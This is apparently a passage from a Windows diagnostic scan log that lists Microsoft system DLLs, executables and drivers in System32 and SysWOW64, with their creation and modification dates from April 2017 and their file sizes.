2017-04-12 11:19 - 2017-03-28 07:36 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinRtTracing.dll
2017-04-12 11:19 - 2017-03-28 07:36 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SerialCommunication.dll
2017-04-12 11:19 - 2017-03-28 07:36 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll
2017-04-12 11:19 - 2017-03-28 07:36 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll
2017-04-12 11:19 - 2017-03-28 07:36 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.UserDeviceAssociation.dll
2017-04-12 11:19 - 2017-03-28 07:36 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicDisplay.sys
2017-04-12 11:19 - 2017-03-28 07:35 - 00505856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2017-04-12 11:19 - 2017-03-28 07:35 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.LowLevel.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-04-12 11:19 - 2017-03-28 07:35 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFi.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentActivation.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00113152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Lights.dll
2017-04-12 11:19 - 2017-03-28 07:34 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2017-04-12 11:19 - 2017-03-28 07:34 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
2017-04-12 11:19 - 2017-03-28 07:34 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Core.dll
2017-04-12 11:19 - 2017-03-28 07:33 - 00609280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Import.dll
2017-04-12 11:19 - 2017-03-28 07:33 - 00265728 _____ C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 01243136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.FaceAnalysis.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SmartCards.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00325120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00271360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-04-12 11:19 - 2017-03-28 07:32 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WwaApi.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2017-04-12 11:19 - 2017-03-28 07:31 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-04-12 11:19 - 2017-03-28 07:31 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mbsmsapi.dll
2017-04-12 11:19 - 2017-03-28 07:31 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2017-04-12 11:19 - 2017-03-28 07:31 - 00390656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2017-04-12 11:19 - 2017-03-28 07:30 - 00819200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll
2017-04-12 11:19 - 2017-03-28 07:30 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NaturalLanguage6.dll
2017-04-12 11:19 - 2017-03-28 07:30 - 00787968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sbe.dll
2017-04-12 11:19 - 2017-03-28 07:30 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Picker.dll
2017-04-12 11:19 - 2017-03-28 07:30 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2017-04-12 11:19 - 2017-03-28 07:29 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Ocr.dll
2017-04-12 11:19 - 2017-03-28 07:29 - 00529920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StructuredQuery.dll
2017-04-12 11:19 - 2017-03-28 07:29 - 00314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Usb.dll
2017-04-12 11:19 - 2017-03-28 07:29 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-04-12 11:19 - 2017-03-28 07:28 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2017-04-12 11:19 - 2017-03-28 07:28 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2017-04-12 11:19 - 2017-03-28 07:28 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll
2017-04-12 11:19 - 2017-03-28 07:27 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CryptoWinRT.dll
2017-04-12 11:19 - 2017-03-28 07:26 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.InkControls.dll
2017-04-12 11:19 - 2017-03-28 07:26 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2017-04-12 11:19 - 2017-03-28 07:25 - 02333184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2017-04-12 11:19 - 2017-03-28 07:25 - 01196544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2017-04-12 11:19 - 2017-03-28 07:24 - 00675840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2017-04-12 11:19 - 2017-03-28 07:23 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Sensors.dll
2017-04-12 11:19 - 2017-03-28 07:23 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll
2017-04-12 11:19 - 2017-03-28 07:22 - 00516096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcli.dll
2017-04-12 11:19 - 2017-03-28 07:22 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTMediaFrame.dll
2017-04-12 11:19 - 2017-03-28 07:22 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\enrollmentapi.dll
2017-04-12 11:19 - 2017-03-28 07:21 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll
2017-04-12 11:19 - 2017-03-28 07:20 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-04-12 11:19 - 2017-03-28 07:20 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll
2017-04-12 11:19 - 2017-03-28 07:20 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-04-12 11:19 - 2017-03-28 07:19 - 00746496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msdtcprx.dll
2017-04-12 11:19 - 2017-03-28 07:19 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-04-12 11:19 - 2017-03-28 07:19 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2017-04-12 11:19 - 2017-03-28 07:19 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dlnashext.dll
2017-04-12 11:19 - 2017-03-28 07:19 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dialclient.dll
2017-04-12 11:19 - 2017-03-28 07:17 - 00895488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Streaming.dll
2017-04-12 11:19 - 2017-03-28 07:17 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-04-12 11:19 - 2017-03-28 07:16 - 01221120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2017-04-12 11:19 - 2017-03-28 07:16 - 00134144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ErrorDetails.dll
2017-04-12 11:19 - 2017-03-28 07:15 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2017-04-12 11:19 - 2017-03-28 07:14 - 00641024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2017-04-12 11:19 - 2017-03-28 07:14 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-04-12 11:19 - 2017-03-28 07:13 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2017-04-12 11:19 - 2017-03-28 07:13 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00654336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00542208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Connectivity.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll
2017-04-12 11:19 - 2017-03-28 07:11 - 02994176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-04-12 11:19 - 2017-03-28 07:11 - 02646528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2017-04-12 11:19 - 2017-03-28 07:11 - 01576448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2017-04-12 11:19 - 2017-03-28 07:11 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Phone.dll
2017-04-12 11:19 - 2017-03-28 07:11 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2017-04-12 11:19 - 2017-03-28 07:10 - 02483200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-04-12 11:19 - 2017-03-28 07:08 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2017-04-12 11:19 - 2017-03-28 07:08 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RADCUI.dll
2017-04-12 11:19 - 2017-03-28 06:48 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-04-12 11:19 - 2017-03-16 06:38 - 00034088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CompPkgSup.dll
2017-04-12 11:18 - 2017-03-28 08:07 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2017-04-12 11:18 - 2017-03-28 08:05 - 01504056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-04-12 11:18 - 2017-03-28 08:04 - 05721808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-04-12 11:18 - 2017-03-28 08:04 - 02262776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-04-12 11:18 - 2017-03-28 08:04 - 01431232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-04-12 11:18 - 2017-03-28 08:04 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2017-04-12 11:18 - 2017-03-28 08:02 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2017-04-12 11:18 - 2017-03-28 07:59 - 06667520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-04-12 11:18 - 2017-03-28 07:59 - 04023008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 20967840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 01851688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 01344448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 01277856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 01202936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 00961192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-04-12 11:18 - 2017-03-28 07:48 - 05685760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-04-12 11:18 - 2017-03-28 07:37 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll
2017-04-12 11:18 - 2017-03-28 07:35 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2017-04-12 11:18 - 2017-03-28 07:33 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.PointOfService.dll
2017-04-12 11:18 - 2017-03-28 07:33 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-04-12 11:18 - 2017-03-28 07:33 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.AllJoyn.dll
2017-04-12 11:18 - 2017-03-28 07:32 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Wallet.dll
2017-04-12 11:18 - 2017-03-28 07:32 - 00386048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFiDirect.dll
2017-04-12 11:18 - 2017-03-28 07:32 - 00332288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2017-04-12 11:18 - 2017-03-28 07:26 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll
2017-04-12 11:18 - 2017-03-28 07:25 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2017-04-12 11:18 - 2017-03-28 07:24 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2017-04-12 11:18 - 2017-03-28 07:24 - 04614656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-04-12 11:18 - 2017-03-28 07:24 - 00901120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2017-04-12 11:18 - 2017-03-28 07:23 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-04-12 11:18 - 2017-03-28 07:23 - 00886272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-04-12 11:18 - 2017-03-28 07:18 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-04-12 11:18 - 2017-03-28 07:17 - 06109696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2017-04-12 11:18 - 2017-03-28 07:16 - 03198464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2017-04-12 11:18 - 2017-03-28 07:14 - 07468544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-04-12 11:18 - 2017-03-28 07:14 - 00103936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Devices.dll
2017-04-12 11:18 - 2017-03-28 07:13 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-04-12 11:18 - 2017-03-28 07:13 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll
2017-04-12 11:18 - 2017-03-28 07:13 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2017-04-12 11:18 - 2017-03-28 07:12 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll
2017-04-12 11:18 - 2017-03-28 07:12 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2017-04-12 11:18 - 2017-03-28 07:12 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2017-04-12 11:18 - 2017-03-28 07:12 - 00862208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-04-12 11:18 - 2017-03-28 07:12 - 00827904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2017-04-12 11:18 - 2017-03-28 07:11 - 01600000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-04-12 11:18 - 2017-03-28 07:09 - 03106304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2017-04-12 11:18 - 2017-03-28 07:08 - 01564160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-04-12 11:17 - 2017-03-28 07:10 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-04-12 11:16 - 2017-03-28 07:36 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll
2017-04-12 11:16 - 2017-03-28 07:36 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-04-12 11:16 - 2017-03-28 07:33 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll
2017-04-12 11:16 - 2017-03-28 07:33 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinRtTracing.dll
2017-04-12 11:16 - 2017-03-28 07:33 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Core.dll
2017-04-12 11:16 - 2017-03-28 07:28 - 00561664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Wallet.dll
2017-04-12 11:16 - 2017-03-28 07:28 - 00551936 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-04-12 11:16 - 2017-03-28 07:28 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2017-04-12 11:16 - 2017-03-28 07:27 - 01388544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll
2017-04-12 11:16 - 2017-03-28 07:27 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\WwaApi.dll
2017-04-12 11:16 - 2017-03-28 07:26 - 00642048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll
2017-04-12 11:16 - 2017-03-28 07:13 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-04-12 11:15 - 2017-03-28 07:30 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WebcamUi.dll
2017-04-12 11:15 - 2017-03-28 07:25 - 00963584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebcamUi.dll
2017-04-12 11:15 - 2017-03-28 07:14 - 03520512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xpsrchvw.exe
2017-04-12 11:15 - 2017-03-28 07:14 - 01080320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Ocr.dll
2017-04-12 11:15 - 2017-03-28 07:13 - 04596224 _____ (Microsoft Corporation) C:\WINDOWS\system32\xpsrchvw.exe
2017-04-12 11:15 - 2017-03-28 07:10 - 02424320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Perception.dll
2017-04-12 11:15 - 2017-03-28 07:10 - 01424896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2017-04-12 11:15 - 2017-03-28 07:10 - 01266176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2017-04-12 11:15 - 2017-03-28 07:09 - 01369088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Phone.dll
2017-04-12 11:14 - 2017-03-28 08:26 - 00218520 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe
2017-04-12 11:14 - 2017-03-28 08:09 - 00097128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Credentials.UI.CredentialPicker.dll
2017-04-12 11:14 - 2017-03-28 08:05 - 01072248 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2017-04-12 11:14 - 2017-03-28 07:38 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-04-12 11:14 - 2017-03-28 07:37 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-04-12 11:14 - 2017-03-28 07:35 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-04-12 11:14 - 2017-03-28 07:35 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2017-04-12 11:14 - 2017-03-28 07:34 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\unimdm.tsp
2017-04-12 11:14 - 2017-03-28 07:31 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-04-12 11:14 - 2017-03-28 07:29 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-04-12 11:14 - 2017-03-28 07:26 - 00284160 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-04-12 11:14 - 2017-03-28 07:21 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTMediaFrame.dll
2017-04-12 11:14 - 2017-03-28 07:18 - 01078784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.dll
2017-04-12 11:14 - 2017-03-28 07:18 - 00100864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2017-04-12 11:14 - 2017-03-28 07:15 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2017-04-12 11:14 - 2017-03-28 07:13 - 00611328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.dll
2017-04-12 11:13 - 2017-03-28 08:32 - 00198856 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll
2017-04-12 11:13 - 2017-03-28 08:29 - 02213248 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-04-12 11:13 - 2017-03-28 08:28 - 00773720 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-04-12 11:13 - 2017-03-28 08:20 - 01181024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-04-12 11:13 - 2017-03-28 08:18 - 01705976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-04-12 11:13 - 2017-03-28 08:10 - 01293152 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-04-12 11:13 - 2017-03-28 08:06 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2017-04-12 11:13 - 2017-03-28 08:05 - 22221368 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-04-12 11:13 - 2017-03-28 08:05 - 01988048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-04-12 11:13 - 2017-03-28 08:05 - 01848584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2017-04-12 11:13 - 2017-03-28 08:05 - 01702392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2017-04-12 11:13 - 2017-03-28 08:05 - 01302136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2017-04-12 11:13 - 2017-03-28 07:59 - 02533728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-04-12 11:13 - 2017-03-28 07:41 - 00372736 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2017-04-12 11:13 - 2017-03-28 07:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\RdpRelayTransport.dll
2017-04-12 11:13 - 2017-03-28 07:34 - 00113664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.ServiceDiscovery.Dnssd.dll
2017-04-12 11:13 - 2017-03-28 07:31 - 00418304 _____ C:\WINDOWS\system32\Windows.Perception.Stub.dll
2017-04-12 11:13 - 2017-03-28 07:31 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpencom.dll
2017-04-12 11:13 - 2017-03-28 07:31 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkBindingEngineMigPlugin.dll
2017-04-12 11:13 - 2017-03-28 07:29 - 00293888 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-04-12 11:13 - 2017-03-28 07:29 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2017-04-12 11:13 - 2017-03-28 07:28 - 00456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll
2017-04-12 11:13 - 2017-03-28 07:28 - 00252416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll
2017-04-12 11:13 - 2017-03-28 07:27 - 00441856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AccountsRt.dll
2017-04-12 11:13 - 2017-03-28 07:26 - 00549376 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-04-12 11:13 - 2017-03-28 07:24 - 01220096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2017-04-12 11:13 - 2017-03-28 07:22 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll
2017-04-12 11:13 - 2017-03-28 07:21 - 03778048 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-04-12 11:13 - 2017-03-28 07:19 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
